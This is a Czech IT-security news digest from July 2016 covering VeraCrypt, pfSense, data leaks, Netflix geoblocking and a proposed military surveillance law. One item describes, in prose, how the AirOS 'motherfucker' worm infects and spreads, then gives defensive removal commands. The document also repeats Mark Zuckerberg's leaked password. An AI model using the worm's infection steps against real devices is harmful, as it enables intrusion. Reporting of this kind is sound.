„Podstatnou vlastností těchto souborů dat, které umožňují opětovnou identifikaci, je, že záznamy chování téhož jedince jsou vzájemně propojené. To je velká část přínosu uchovávání těchto záznamů,“ uvádí Hall.

Velkým problémem je podle něj zveřejňování souborů dat, které byly špatně anonymizované, a také sdílení údajů, u nichž se předpokládá nepřítomnost osobních informací, ale ve skutečnosti obsahují nějaký druh trvalého identifikátoru, který lze triviálně přiřadit k odpovídajícím osobám.

Zatímco některé shromažďování dat skutečně směřuje k ekonomickému prospěchu či zdraví obyvatelstva, Hall poznamenává, že v mnoha případech tomu tak není. „Některé maloobchody používají sledování Wi-Fi, v rámci něhož se využívá MAC adresa vašeho přístroje (trvalý síťový identifikátor), aby vás ve svém obchodě pečlivěji sledovali. To je důvod, proč Apple začal tyto adresy ‚randomizovat‘.“

Paul O‘Neil, konzultant pro zabezpečení informací ve společnosti IDT911 Consulting, má téměř totožný názor. „Pokud se anonymizace udělá dobře, potom to skutečně může fungovat. To slovo ‚pokud‘ je však mnohem významnější podmínka, než si většina lidí uvědomuje.“

Co má být anonymní?

Raul Ortega, manažer společnosti Protegrity, upozorňuje také na to, jak nevyrovnaná je ochrana soukromých dat. „Zatímco se zabezpečení kreditních karet zlepšuje, v oblasti anonymizace hromady citlivých osobních údajů, které existují v každé firmě, se toho dělá jen velmi málo.“

Částí tohoto problému může být podle právních expertů určitý aspekt sémantiky, který vede k obecnému zmatku. „Musíme mít jasno v tom, co máme na mysli, když prohlašujeme data za anonymní,“ upozorňuje Kelsey Finchová, poradkyně fóra pro budoucnost soukromí (FPF, Future of Privacy Forum).


Netflix blokuje IPv6 tunely kvůli geolokaci

27.7.2016 Zdroj:Root.cz Zabezpečení
Netflix je nucen kvůli správcům autorských práv dohlížet na geolokaci uživatelů a určitý obsah nabízet jen v některých zemích. Dříve bylo možné to obejít pomocí VPN, ale firma od začátku letošního roku začala blokovat přístup ze známých VPN. Čtěte: Netflix už nedovolí obejít omezení pomocí VPN

Nyní populární streamovací služba začala blokovat řadu IPv6 tunelů. Uživatelé využívající tunely Hurricane Electric jsou zablokovaní úplně, ale problémy hlásí i uživatelé dalších poskytovatelů s nativní IPv6 konektivitou. Navíc zákaznická podpora doporučuje uživatelům úplně vypnout podporu IPv6 na svých počítačích. Přestože internet směřuje k IPv6, správci obsahu tlačí Netflix opačným směrem.
Podobným problémem netrpí jen Netflix, ale také český Stream.cz má s tunely od HE problém. Některé zahraniční pořady odmítne přehrát, protože IPv6 adresy jsou přidělovány z rozsahu 2001:470::/32, který je podle WHOIS přidělen ARIN do USA.


Belgie vede žebříček států v kybernetické napadnutelnosti

27.7.2016  Zdroj:Root.cz Hrozby
Belgie překvapivě vede žebříček států v kybernetické napadnutelnosti. Následuje Tádžikistán, Samoa a Austrálie. Žebříček byl zpracován bezpečnostní firmou Rapid7 a v podstatě odráží jen počet otevřených portů na veřejných IP adresách.

Nás může těšit, že Česká republika je až na 34. místě, za například USA na 14. místě nebo UK na 23.


TOP-10 bezpečnostních incidentů v květnu 2016

27.7.2016  Zdroj:Root.cz Incidenty

Minulý měsíc se stalo mnoho zajímavých událostí a bylo velmi těžké vybrat jen 10 z nich. Přesto se nám to podařilo a tady je naše hodnocení TOP-10 bezpečnostních incidentů.

Výběr z bankomatů v Japonsku
Dne 15. května se skupina dobře organizovaných zločinců (známých jako „kapky“ v cardingovém slangu)inkasovala 1,4 miliardy jenů (asi 12 milionů EUR) z bankomatů v 16 městech. Celá operace byla velmi dobře organizovaná, trvalo to jen 2,5 hodiny a účastnilo se jí více než 100 lidí. Jedná se o největší výběrový podvod od roku 2012.

InvestBank UAE narušení
Hackeři publikovali archiv 10Gb, který obsahuje interní soubory, citlivé finanční dokumenty a okolo 100 tisíc čísel kreditních karet od roku 2011 až do září 2015.

Útok na turecké státní nemocnice
17. května hackeři zveřejnili video na YouTube prohlašující proniknutí do tureckých státních nemocnic.Odhalili obrovskou databázi obsahující osobní údaje lidí s diagnózou HIV a žen, které byly na potratu. Podle oficiálních zpráv z vyšetřování, bylo útokem ovlivněno celkem 33 nemocnic.

Únik dat švýcarského RUAG
V září 2014 švýcarský vojenský dodavatel utrpěl obrovské datové narušení, které bylo objeveno až v lednu 2016. V květnu švýcarský CERT zveřejnil podrobnou zprávu o útoku, vysvětluje, jak se to stalo a kdy. Podle zprávy, měli útočníci přístup k síti RUAGu déle než jeden rok a jistě ukradli spoustu důvěrných informací.

Hack hackerského fóra Nulled.io
Hackeři zveřejnili částečný výpis databáze z hackerské webové stránky nulled.io. Výpis obsahoval e-mailové adresy, hash hesla a IP adresy 145 096 aktivních členů fóra.
Únik přihlašovacích údajů na Mail.ru
Dne 5. května získalo publicitu to, že obrovská databáze obsahující 272,3 milionů uživatelských přihlašovacích údajů se prodává na temném webu. Tato databáze obsahuje asi 57 milionů mail.ru účtů a desítky milionů přihlašovacích údajů od jiných poskytovatelů e-mailu, jako je Google, Yahoo a Microsoft. Další vyšetřování do hloubky odhalilo, uniklé údaje byly zastaralé.

Linkedin hack
Téměř 117 milionů účtů uživatelů LinkedIn bylo prodáno na temném webu. Tato data byla ukradena v roce 2012.

MySpace únik dat
27. května LeakedSource prohlásil, že má v držení 360 milionů e-mailů a hesel uživatelů MySpace, kdysi slavné sociální sítě. S největší pravděpodobností to také není čerstvé narušení.

Tubmlr únik dat
Loginy a hesla uživatelů Tubmlr se vynořily po narušení v roce 2013. Společnost tvrdí, že nevěděli o narušení dokud nebyla databáze nabídnuta k prodeji.

Twitter hack
Symantec varoval, že hackeři získali přístup k téměř 2,5 tisíc uživatelským účtům na Twitteru a šířili odkazy na webové stránky s obsahem pro dospělé. Mezi oběťmi byli novináři z The Telegraph a New York Times a populární kanadská kapela Chromeo.


TrueCrypt přežil svůj konec. Je bezpečný a navazuje na něj VeraCrypt

27.7.2016  Zdroj:Root.cz Zabezpečení
Před dvěma roky světem IT zamávala zpráva, že končí TrueCrypt, jeden z nejpopulárnějších šifrovacích programů. Vše ale nakonec dobře dopadlo a vznikl povedený nástupce VeraCrypt.
TrueCrypt, zřejmě nejpopulárnější program pro šifrování souborů, skončil 28. května 2014, a to za poněkud zvláštních okolností. Anonymní autoři prostě řekli balíme to a mimo jiné napsali: Používání TrueCryptu není bezpečné, může obsahovat neopravené bezpečnostní chyby. To samozřejmě přililo olej do ohně konspiračním teoretikům, kteří v tom viděli spiknutí, nátlak atp. Ale vzhledem k nastalé situaci se tomu nelze divit.

Dva roky poté nejsou okolnosti konce o nic jasnější, ven se nedostaly žádné nové informace. Asi se tak přikloníme spíš k té nejprostší teorii, že už to autory prostě nebavilo. Autoři ještě nějakou dobu komunikovali přes e-mail, ale nic moc dalšího neprozradili. Za zmínku stojí snad jen fakt, že nedoporučovali fork programu a naopak doporučili začít od nuly: Myslím, že začít od začátku by nevyžadovalo o tolik víc práce, než se snažit pochopit kód současného TrueCryptu, napsal jeden z autorů.
Už před koncem programu se rozjel projekt, jehož cílem bylo TrueCrypt auditovat. Na nezávislý audit se prostřednictvím iniciativy Open Crypto Audit vybralo víc než 70 tisíc dolarů. A tak se i přes ukončení projektu v auditu pokračovalo. Audit provedla společnost iSEC Partners a jeho výsledky potěšily. Sice byl v kódu trochu nepořádek a našlo se několik chyb nízké a střední závažnosti, ale co je nejdůležitější, žádná neoslabovala samotné šifrování.

Asi nejzávažnější nalezená chyba se přitom týkala pouze verze pro Windows. Ve výjimečných případech, kdy se nepovedlo inicializovat Crypto API pro generování (pseudo)náhodných čísel, na to reagoval prostě tak, že sbíral (slabší) entropii z jiných zdrojů. Ale ani audit neodhalí vše, jak ukázalo nalezení poměrně závažné chyby v září 2015. Šlo však o chybu za určitých podmínek umožňující eskalaci práv ve Windows. Opět nic, co by představovalo problém pro spolehlivost samotného šifrování.

Forky brzdí komplikovaná licence
Být TrueCrypt klasický svobodný software, asi by se nad odchodem původních autorů mávlo rukou a zkrátka by na ně navázal někdo jiný. Jenže TrueCrypt tak úplně svobodný není. To je také důvod, proč ho běžně nenaleznete v linuxových distribucích. TrueCrypt používá vlastní licenci, která však není tak restriktivní, jak se traduje. Omezení spočívá jen v tom, že odvozené dílo není možné distribuovat s názvem a logem TrueCrypt. Určité pasáže licence působí trochu nejasně, ale z žádné části nevyplývá, že by software nebylo možné modifikovat a redistribuovat.

Odborná veřejnost se tak nějak shodla, že na forkování TrueCryptu není nic špatného. A tak se forkuje i přes přání autorů, že už by se projekt měl nechat být. Původní licence se bohužel zbavit nelze a bude dále působit jako pomyslná koule na noze odvozených projektů, pro které zřejmě zůstane cesta do distribucí uzavřena. I přesto, že odvozené projekty už jsou mnohem otevřenější než původní TrueCrypt – jeho autoři např. jeli jen na sebe a nepřijímali příspěvky jiných vývojářů.

Možná někoho napadlo, co by se stalo, kdybyste prostě kód TrueCryptu vzali a vydali pod svobodnou licencí? Prakticky asi nic. Těžko by asi došlo k situaci, kdy by původní autoři vyšli z anonymity a hnali vás k soudu. Na druhou stranu open-source komunita licence obecně ctí a takový postup nepřipadá v úvahu. Navíc hrozba sporu, byť jen teoretická, by nad softwarem stále visela. Takže není jiná možnost, než prostě dodržovat licenci nebo napsat software nový, třeba s TrueCryptem kompatibilní.

Nejlepší nástupce: VeraCrypt
Nakonec tedy vzniklo několik forků, z nichž je nejrozšířenější VeraCrypt. Ten se od samého počátku nesnažil dělat žádnou revoluci, ale prostě TrueCrypt udržovat. Takže např. byly opraveny nalezené chyby, ale rozhraní ani funkce se prakticky nezměnily. Projekt je hostován na Codeplexu a spravuje ho francouzská bezpečnostní společnost IDRIX. Část kódu je licencována pod licencí TrueCrypt, část (nová) pod Apache License 2.0.

Hlavní změnou je menší úprava formátu souborů (volume), která však způsobuje nekompatibilitu s TrueCryptem. Týká se to vytváření hlavičky souboru, kdy VeraCrypt používá víc opakování, což by mělo být bezpečnější. Nějaký čas VeraCrypt fungoval pouze s novým formátem, ale později byla přidána i podpora starého formátu z TrueCryptu. Ale pouze pro mountování, nové soubory ve starém formátu už nevytvoříte. Nezapomeňte při mountování zaškrtnout, že se jedná o starý formát, program to poznat nedokáže.

VeraCrypt
VeraCrypt se dočkal už jedenácti verzí, poslední verze 1.17 vyšla v únoru. Nástroj standardně podporuje Linux, Windows a OS X. Aktuálně lze říct, že všechny menší či větší nedostatky TrueCryptu už byly napraveny a vývojáři už pracují i na větších vylepšeních. Jde hlavně o možnost šifrovat systémové oddíly při použití UEFI. Tuto důležitou funkci kdysi plánoval přidat i TrueCrypt, ale nakonec k tomu nedošlo.

Zmínit můžeme také fork CipherShed, který se zprvu jevil jako nejnadějnější nástupce TrueCryptu. Počáteční nadšení ale rychle opadlo a vývoj se táhne. Letos v únoru přece jen vyšla první verze 0.7.4.0, která opravuje několik chyb TrueCryptu, ale od té doby se zase nic moc neděje. Binárky jsou navíc k dispozici pouze pro Windows.

Závěr
I v roce 2016 můžete pohodlně a pravděpodobně i bezpečně TrueCrypt používat. Otázkou je, zda je lepší použít starý TrueCrypt nebo aktualizovaný VeraCrypt. Záleží na úhlu pohledu. Poslední verze TrueCryptu 7.1a sice obsahuje nějaké ty chyby, ale víme, že nejsou závažné. VeraCrypt zase staré chyby opravuje, ale nemůžeme vědět, zda mezitím nevznikly nové a možná závažnější, protože zdrojový kód není systematicky prověřován.

Přestože VeraCrypt a práci lidí z IDRIXu oceňuji, byl bych radši, kdyby byl vývoj ještě otevřenější. Asi kvůli relativně malému projektu nemusíme zakládat nadaci, ale bylo by fajn, kdyby ho pod svá křídla vzala nějaká OSS organizace s dobrou reputací a vývoj transparentně organizovala. Sice je hezké, že se udělal audit, ale když se kód nebude revidovat soustavně (a nejlépe nezávisle), tak zas budeme tam, kde jsme byli.


Firewall pfSense založený na FreeBSD: historie projektu

27.7.2016  Zdroj:Root.cz Zabezpečení

V mini seriálu o firewallu pfSense si povíme o této distribuci založené na FreeBSD. Odhalíme historii projektu a postupně se podíváme na jednotlivé vlastnosti systému.
Historie projektu pfSense
Firewalů a routerů pro použití v různých sítích exisuje celá řada. Velmi známým open source firewallem je např. OpenWRT, ten je postaven na linuxovém kernelu a disponuje velkou a aktivní komunitou. Do kategorie open source se též řadí již 12 let projekt pfSense, který stojí na odlišných základech a těmi je prověřený operační systém FreeBSD. Z názvu projektu jsou velmi významná první dvě písmena, která označují stavový firewall Packet Filter, který je vyvíjen jako součást operačního systému OpenBSD, z něhož je portován na ostatní *BSD platformy. Je málo známé, že Packet Filter je portován i na Apple OS X.

Projekt vznikl v roce 2004 jako fork staršího obdobného projektu m0n0wall. Spoluzakladateli projektu byli Chris Buechler a Scott Ullrich. Za projektem dnes stojí společnost Electric Sheep Fencing LLC. V letech 2003–2013 byl pfSense pod křídly BSD Perimeter LLC. Důvody pro změnu názvu a přemístění společnosti uvedl Chris na blogu projektu.

Z projektu m0n0wall vzniklo hnedle několik dalších dobře známých open source projektů jako je FreeNAS, AskoziaPBX a nejnovějším je OPNsense. V loňském roce 15. února 2015 se Manuel Kasper rozhodl projekt m0n0wall definitivně ukončit.

Počátkem roku 2015 jsem zaregistroval zprávičku o poněkud nesvobodném chování uvnitř projektu. Situace byla hodně nepřehledná a přelicencování projektu způsobilo vznik nového forku pfSense, tím se stal již zmiňovaný OPNsense. Nový fork jsem zatím nevyzkoušel, ale v rámci tohoto seriálu si na něj čas udělám. Dne 12.4. 2016 vyšla poslední, nová a značně přepracovaná verze 2.3, která nese přívlastek pfSense-CE (Comunity Edition). Dá se tedy očekávat, že pfSense-EE (Enterprise Edition) verze bude přítomna v produktové rodině hardware nabízené na stránkách projektu. Již zmiňovaný Manuel Kasper se zjevně přiklonil na stranu OPNsense tímto prohlášením. Pevně věřím, že částečná komercionalizace projektu pfSense neublíží.

Podporovaný embedded hardware
Společným jmenovatelem pro m0nOwall i pfSense byl embedded hardware od společnosti PC Engines, s nimiž se v souběhu vyvíjely i oba firewalové systémy. Společnou mají podporu Compact Flash instalací, kterou zmíněný HW vyžaduje. Dalším použitelným výrobcem pro oba systémy je např. společnost Soekris.

Švýcarská společnost PC Engines vyráběla desky s označením WRAP, podstatně inovovanější jsou dnes stále vyráběné desky ALIX a současné nejmodernější jsou desky s označením APU, které jsou osazeny mSATA slotem, který konečně překonává zastaralé a pomalé Compact Flash. Do slotu lze instalovat malé mSATA SSD moduly např. o velikosti 16 GB. Desky PC Engines disponují též slotem miniPCI express, do kterého se dá připojit WiFi karta a tím se rozšíří funkcionalita routeru. Nastavení WiFi adaptéru má v pfSense velmi široké možnosti, které si popíšeme v dalších dílech.

pfSense je současně zdarma stažitelný pro architektury AMD64 a i386 ve verzích, viz tabulka. Dále ještě existují verze pro VGA a sériovou konzoli.

Platforma
CD images (ISO) with installer
Memstick image with installer
Embedded (NanoBSD) typically with CF
Média ISO a Memstick jsou instalovatelné na libovolný hardware architektur AMD64 a i386. Instalace je možná i jako virtuální appliance. pfSense disponuje balíčkem Open VM Tools, který je potřebný při instalaci do VMWare prostředí. Podporovaný hardware musí splňovat požadavky dle FreeBSD hardware notes příslušné verze, kterou pfSense používá.

U embedded verze je nutné poznamenat, že používá NanoBSD, které vyvinul Poul-Henning Kamp. NanoBSD vytváří bitové kopie systému FreeBSD pro embedded aplikace, vhodné pro použití na Compact Flash (či jiných paměťových médiích).

Při výběru hardware pro požadovanou síťovou úlohu je vždy nutné zvolit patřičně výkonný hardware. Zde je uvedeno pěkné srovnání použití šifer pro OpenVPN a IPSec v závislosti na rychlosti spojení od jednoho výrobce používajícího pfSense.

Jednou z nevýhod je bezesporu cena, která je u HW pro pfSense vyšší než například ceny RouterBoard desek pro MikroTik. Nevím přesně, jak je to s výkonem CPU a RAM u nějakých srovnatelných modelů.

Historie verzí
Během 12letého vývoje se pfSense patřičně proměnil. Bylo přídáno mnoho funkcí a různých rozšiřujících balíčků. Poslední verze 2.3.1 přinesla velké množství oprav a změn. Asi největší změnou je zcela nový vzhled GUI využívající Bootstrap framework. Web server lighttpd byl vyměněn za nginx. Pro rychlé nahlédnutí na pfSense 2.3 autoři připravili pěkné video. Mezi firewallová pravidla lze nově vkládat separátor pro přehledné oddělení pravidel. Dále se výrazně upravily možnosti konfigurace grafů. Změn je opravdu mnoho.

Starší verze pfSense tak trochu pokulhávaly s použitím aktuálního FreeBSD. To se od verze 2.2 výrazně posunulo. Aktuální pfSense 2.3.1 používá FreeBSD 10.3-RELEASE-p3 a ve svých opravách důsledně příjímá i opravy FreeBSD systému, což dříve též nebylo zvykem. Pokud se tedy objeví nějaká chyba ve FreeBSD Security Advisories, velmi brzo se opraví i verze pfSense.
Verze pfSense
Version 1.0 October 4, 2006
Version 2.0 September 17, 2011
Version 2.1 September 15, 2013
Version 2.2 January 23, 2015
Version 2.3 April 12, 2016
Jednou z velmi zajímavých vlastností pfSense je snadná možnost aktualizací sama sebe. Není tedy nutné nějak složitě provádět manuální výměny firmware. Vždy je nutné se držet instrukcí v Upgrade Guide.

Dashboard pfSense 2.2

Verze 2.2.x se barvila do červena a zavedla volitelný dashboard.

Dashboard pfSense 2.3

Verze 2.3.x přišla s již popisovanými novinkami. Menu zůstalo v zásadě stejné, proto se uživatelé neztratí při přechodu na novější verze.

Seznam základních vlastností a funkcionalit
Závěrem uvádím seznam vlastností projektu pfSense i s odkazy na dokumentaci.

Firewall with stateful packet inspection
Easy to use Web Based Graphical Interface
Installation Setup Wizard
Configurable Dashboard with many available widgets
IPv4 and IPv6 support
Wireless Access Point (must install a wireless interface which supports hostap mode), including VAP/MBSS support on certain chips.
Wireless Client Support (802.11 and 3G/4G with supported devices)
Ability to setup and filter/isolate multiple interfaces (LAN, DMZ, etc.)
Traffic Shaping (ALTQ, Limiters, 802.1p match/set, DiffServ/DSCP matching)
State Table controls (per-rule / per-host limits, timers, etc.)
NAT (Port Forwards, 1:1 NAT, Outbound NAT, NPt)
Redundancy/High Availability – CARP+pfsync+XMLRPC Config sync allows for hardware failover. Two or more firewalls can be configured as a failover cluster.
Multi-WAN Support
Server Inbound Load Balancing
Network diagnostic utilities such as ping, traceroute, port tests via the GUI (more with packages, such as nmap)
VPN – IPsec (including Phase 2 NAT), OpenVPN, L2TP
PPPoE Server
RRD Graphs
Real-time interface traffic graphs
Dynamic DNS
Captive Portal
DHCP Server and Relay (IPv4 and IPv6)
Command line shell access (Via console and SSH)
Wake on LAN
Built in packet capture / sniffer
Ability to backup and restore the firewall configuration via the web GUI
Edit files via the web GUI
Virtual interfaces for VLAN, LAGG/LACP, GIF, GRE, PPPoE/PPTP/L2TP/PPP WANs, QinQ, and Bridges
Caching DNS Forwarder/Resolver
Can be run in many virtualization environments
Proxy Server (using packages)
Závěr
V dalším díle mini seriálu o pfSense se podíváme na možnosti instalace a práce s routerem na sériové konzoli. Dále si ukážeme další vybrané funkcionality, které pfSense umí.


Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)

27.7.2016  Viry
Zařízení s operačním systémem AirOS jsou ohrožena kvůli vážné bezpečnostní mezeře, která dovoluje modifikovat souborový systém bez znalosti přihlašovacích údajů. Jak se bránit?
Před pěti lety se kvůli bezpečnostní díře začal šířit virus Skynet. Možná si pamatujete na nahodilé restartovaní zařízení. Před měsícem byla popsána nová bezpečnostní díra ve všech typech zařízení AirOS. Ta umožňuje útočníkovi nahrát jakýkoliv soubor kamkoliv do souborového systému Wi-Fi zařízení bez znalosti přihlašovacích údajů.

V pondělí 16. května byl konečně vydán opravný firmware verze 5.6.5, který tuto chybu řeší. Jak se vlastně dostane do nezabezpečeného zařízení?

Infekce zařízení
Jelikož exploit umožňuje nahrání souboru kamkoliv do souborového systému, virus si nahraje veřejný klíč SSH do routeru (bez nutnosti autentizace). Také zkopíruje sám sebe do zařízení. Přihlásí se pomocí SSH a nainstaluje se. Tedy rozbalí si tar, zapíše se do souboru rc.poststart a zapíše se do perzistentní paměti. Pak se restartuje.

Po restartu
Znovu se rozbalí z taru, a spustí soubor mother. Tato matka si nastaví firewall na HTTP/HTTPS – tím můžete poznat infikované zařízení. Dále inicializuje stažení příkazu curl a několika knihoven pomocí wget. Příkaz curl potřebuje pro své šíření a nevejde se do perzistentní paměti.

Následně spustí search a začne skenovat adresní prostor. Pokud najde zařízení, které by mohlo být „airos“, zkusí na něj nahrát pomocí HTTP (HTTPS) opět svůj veřejný klíč a následně se zkusí pomocí SSH přihlásit do zařízení a nainstalovat se.

To však není vše. Skript si ukládá IP adresu pravděpodobně infikovaných zařízení a zkusí je všechny přibližně jednou za 66 666 sekund (18,5 hodiny) resetovat pomocí webového přístupu do továrního nastavení – skript fucker. Reset se podaří jen na zařízení, které se nepodařilo správně infikovat a samozřejmě mají zranitelný firmware.

Dále na hostitelském zařízení pustí odpočet na 666 666 sekund (7,5 dne) a po uplynutí přenastaví ESSID na „motherfucker“ a následně zařízení vypne. Detaily naleznete na fóru ubnt.

Jak se bránit?
Především aktualizovat na firmware 5.6.5! Zároveň je dobré nasadit firewall na HTTP nebo HTTPS, stačí jej nastavit ve webovém rozhraní zařízení. Dále je možné nastavit naslouchání zařízení na jiný než výchozí port 80 či 443. Zkušenější samozřejmě mohou využít vlastních skriptů v ubnt.

Pokud už jste byli napadeni, můžete manuálně odstranit virus pomocí SSH:

# cd /etc/persistent/
# rm mf.tar
# rm rc.poststart
# rm -R .mf
# sed -i "/^mother/d" /etc/passwd
# cfgmtd -p /etc/ -w
# reboot
Doufám, že všichni stihnete aktualizovat dříve, než naši republiku pokryje Wi-Fi nápis „motherfucker“.


Další hesla na prodej, 32 milionů hesel od účtů na Twitteru

27.7.2016  Zdroj:Lupa.cz Sociální sítě
Pokud jste ještě nezačali řešit dvoustupňové ověřování na podstatné online služby, tak je nejvyšší čas.
LeakedSource získal databázi 32 milionů účtů z Twitteru s kompletními přihlašovacími údaji, tedy určením účtu a jeho hesla. Odkud přesně data pocházejí, jasné není, jsou ale na prodej na darkwebu. Jde přesně o 32 888 300 záznamů obsahujících e-maily, uživatelská jména (název účtu) a hesla. Pokud se obáváte, že by vaše heslo mohlo být mezi uniklými, můžete si to na LeakedSource ověřit. Druhá varianta pro ověřování je haveibeenpwned.com.

Je krajně nepravděpodobné, že by šlo o únik (hack) z Twitteru jako takového. Nejpravděpodobnější vysvětlení je, že jde o data nasbíraná z malware, které po napadení prohlížečů (Firefox, Chrome zejména) shromažďuje přihlašovací údaje. LeakedSource navíc upozorňují, že množství údajů v databázi pochází z Ruska, šest z deseti nejvíce používaných domén v e-mailech pochází právě odtamtud.

Nejvíce populární heslo v tomto úniku je stále 123456 (17 471 výskytů. Zuckerbergovo heslo v tomto úniku není, ale jak už víme, Mark Zuckerberg používá všude jedno snadné heslo. Nebuďte jako on a hesla mějte unikátní, složitá a tam, kde je to podstatné (což může být právě účet na Twitteru), si pořiďte dvoufaktorové ověření.
Pokud se na výše uvedených službách vydáte ověřovat, zda váš e-mail není v některém z úniku, tak je dobré vědět, že tím nezjistíte, jaké heslo uniklo. Jen to, zda se určitý e-mail nachází v některém z úniků.


Vojenští špioni chtějí sledovat internetový provoz. I bez posvěce­ní soudem

27.7.2016  Zdroj:Lupa.cz Sledování
Česká armáda se chystá na kyberválku. Buduje Národní centrum kybernetických sil a chce dát Vojenskému zpravodajství nové digitální pravomoci.
Iluze o naprosto svobodném internetu v Česku, do kterého nijak nezasahují státní složky, se postupně rozplývá – a nemůže za to jen nedávno schválený zákon o hazardních hrách. Teď chce výrazně silnější pravomoci, týkající se „odposlechu“ internetového provozu, také ministerstvo obrany, respektive Vojenské zpravodajství.

Sledovat síťový provoz už dnes běžně může policie v rámci boje proti kriminálníkům používajícím ke své činnosti internet. Systém v tomto případě funguje tak, že policie na základě rozhodnutí soudu kontaktuje providera či provozovatele datového centra, u kterého se následně provádí technické sledování.

„Dokonce to funguje tak, že v podstatě policii dodáváme službu. Odkloníme provoz daného serveru na jiný server, kde pak vše zaznamenáváme. Státu pak za to posíláme fakturu,“ vysvětluje pro Lupu jeden z providerů, který nechce být jmenován.

Stát za uchovávání dat platí i v dalším případě, který se týká takzvané data retention. V rámci této povinnosti musí provideři po dobu šesti měsíců uchovávat informace o komunikaci. K těmto údajům pak opět po rozhodnutí soudu mají přístup tajné služby, ČNB či policie.

Provideři si technologie pro účely data retention nakupují sami. V podstatě jde o běžné servery a routery, které v síti fungují jako sondy. V Česku se obvykle používají „krabice“ od brněnské firmy Flowmon Technologies či Radware. Jedna taková sestava vyjde na částku kolem 15 milionů korun, plus jsou zde samozřejmě náklady na místo v serverovém racku, napájení a podobně. I zde se faktury posílají státu.

„Občas to má i trochu bizarní nádech. Někdy chtějí státní složky s providerem, u kterého chtějí technologie nasazovat, diskutovat například technická řešení. Takovou činnost lze státu fakturovat jako konzultaci,“ popisuje další z poskytovatelů.

Internetový odposlech bez soudu
Tyto dva případy mají jedno společné – o nasazování „štěnic“ či poskytování dat rozhoduje soud. To ovšem nemá být případ chystané novely zákona č. 289/2005 Sb., o Vojenském zpravodajství, kterou předložilo ministerstvo obrany spadající pod vládu Babišova hnutí ANO.

Vojenské zpravodajství by podle novely mělo získat možnost instalovat „internetové odposlechy“ přímo u providerů. Ovšem s tím rozdílem, že o nasazení by měla místo soudu rozhodovat přímo vláda, kterou bude moci o použití odposlechů požádat šéf Vojenského zpravodajství, respektive ministr obrany.

Podle důvodové zprávy nemusí nasazení techniky schvalovat soud, protože Vojenské zpravodajství nebude mít podle novely právo sledovat obsah komunikace konkrétních osob, ale jen „obecných znaků datového provozu odůvodňujících možné následné užití obranných aktivit.“

„…zákon o Vojenském zpravodajství i dosud stanovuje, že použitím zpravodajské techniky, pokud jím není zasahováno do základních práv a svobod, není monitorování telekomunikačního, radiokomunikačního nebo jiného obdobného provozu bez odposlechu jeho obsahu, popřípadě zjišťování údajů o tomto provozu, to znamená, že k monitorování provozu sítí bez soudního povolení je Vojenské zpravodajství oprávněno již nyní,“ argumentuje ministerstvo.

Kybernetická obrana
Česká armáda už - podobně jako například NATO - postavila kybernetický boj na úroveň toho tradičního, a v rámci těchto aktivit chce vytvořit nové Národní centrum kybernetických sil, které má fungovat právě pod Vojenským zpravodajstvím. Roční provoz má vyjít na 300 milionů korun ročně.

Náklady lze čekat i na straně providerů. To, do jaké výšky se vyšplhají, ještě není jasné, vojáci každopádně mají providerům investice do technických prostředků uhradit. Pokud by někdo neumožnil spolupráci, má dostat pokutu. Největší problém novely ale tkví v něčem jiném.

„V zákoně o elektronických komunikacích se doplňuje povinnost právnických a fyzických osob zajišťujících síť elektronických komunikací nebo poskytujících službu elektronických komunikací na náklady Vojenského zpravodajství zřídit a zabezpečit v určených bodech své sítě rozhraní pro připojení technických prostředků kybernetické obrany,“ píše ministerstvo obrany.

Možná analýza komunikace
Jenže zde lze debatovat nad pojmem „kybernetická obrana“. Například Národní bezpečnostní úřad v připomínkovém řízení uvádí, že zákon nijak neřeší skutečnou aktivní kybernetickou obranu. „Novela vyvolává silný dojem, že je zpravodajského charakteru a cílí pouze na sběr informací a kybernetickou obranu řeší jen administrativně,“ zmiňuje se NBÚ, který sám kyberochranu země řeší.

Ministerstvo obrany plánuje vytvořit vlastní novou vojenskou síť, která má být odolná vůči kybernetickým útokům – ta ale není součástí novely zákona o Vojenském zpravodajství a přímo s ní nesouvisí.

Zmiňovanému zpravodajskému charakteru novely zákona nahrává i to, že Vojenské zpravodajství by mělo čistě technicky mít možnost sledovat i obsah komunikace, například prostřednictvím dost agresivní metody Deep Packet Inspection analyzující přímo pakety. To už by tak trochu bylo na úrovni Ruska a jeho „černých krabic“ SORM, které k providerům instaluje tamní tajná služba FSB.

Jako měření rychlosti
Novela zákona sice jasně neříká, že je možné sledovat i obsah samotné komunikace. Problémem je, že technologie to zvládnou a zákon analyzování komunikace nezakazuje. Proti tomu se v připomínkovém řízení ohrazují například Bezpečnostní informační služba (BIS), Hospodářská komora ČR nebo ministerstvo spravedlnosti. Kritici požadují, aby zákon možnost naslouchání komunikace přímo zakázal.

Ministerstvo obrany v důvodové zprávě ujišťuje, že „technické prostředky kybernetické obrany (…) nemají za cíl narušovat soukromí nebo tajemství zpráv a, to je třeba zdůraznit, rozhodně neopravňují Vojenské zpravodajství sledovat obsah komunikace konkrétních osob (pro tento typ jednání nadále a výhradně platí pravidla pro použití zpravodajské techniky), ale pouze signalizovat určité přesně definované negativní jevy související s kybernetickým prostorem.“

Monitoring kyberprostoru pak přirovnává k tzv. úsekovému měření rychlosti na silnicích. „Kamerový systém změří a zaznamená rychlost (tj. chování) všech vozidel bez rozdílu a bez identifikace, a správní orgány se poté zaměří jen na ta vozidla, jež jsou automaticky vyhodnocena jako vozidla porušující pravidla, přičemž ostatní zůstanou bez povšimnutí,“ argumentuje.


Mark Zuckerberg používá všude jedno snadné heslo. Nebuďte jako on

27.7.2016  Zdroj:Lupa.cz Hrozby
Pokud jste si v úniku hesel z LinkedIn našli heslo Marka Zuckerberga, mohli jste mu „hacknout“ Twitter i Pinterest. Někdo byl ale zřejmě rychlejší.
Heslo Marka Zuckerberga z LinkedIn bylo „dadada“ a o víkendu ho útočníci použili k „hacknutí“ jeho účtu na Twitteru i na Pinterestu. Chápete to správně, Zuckerberg používá zásadně jednoduché heslo, nejspíše i na více službách. A poté, co toto heslo unikne na veřejnost, zůstane v klidu. Tedy do okamžiku, než mu někdo nabourá další účty.

Šéf (a částečný majitel) jedné z nejsilnějších internetových firem se prostě chová jako ten nejhloupější uživatel internetu. Buď jedno a to samé heslo používá na dalších službách, nebo používá nějaký klasický, snadno odhadnutelný systém, který útočníkům umožní uhodnout i hesla na jiných službách.

TIP: Jak vytvářet silná a přitom dobře zapamatovatelná hesla?

Proti běžným smrtelníkům má ovšem Zuckerberg jednu výhodu: Twitter i Pinterest mu jeho účty velmi rychle vrátily. Což se u normálního člověka stane velmi málokdy a je to nesmírně obtížné.

